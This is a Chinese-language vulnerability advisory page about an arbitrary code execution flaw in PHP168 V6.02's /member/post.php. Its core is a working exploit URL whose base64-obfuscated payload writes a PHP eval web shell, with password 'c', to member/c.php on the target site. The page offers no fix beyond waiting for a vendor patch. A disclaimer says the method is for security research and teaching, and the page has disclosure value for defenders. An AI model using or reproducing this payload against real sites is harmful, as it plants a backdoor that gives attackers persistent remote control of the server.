安全风向标 |
|
分类 |
|
|
|
|
|
PHP168 V6.02 文件/member/post.php执行任意代码漏洞 |
|
|
影响版本: PHP168 V6.02
漏洞描述: PHP168整站是PHP领域当前功能最强大的建站系统,代码全部开源,可极其方便的进行二次开发,所有功能模块可以自由安装与删除,个人用户完全免费使用。
PHP168在某数组没有初试化,导致可以提交任意代码执行。
测试方法: [www.safe.sh] 本站提供程序(方法)可能带有攻击性, 仅供安全研究与教学之用,风险自负!
/member/post.php?only=1&showHtml_Type[bencandy][1]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}&aid=1&job=endHTML
直接在该目录生成个member/c.php 密码为c
Safe.sh安全建议: 暂无 等待官方补丁 |
|
|
|
|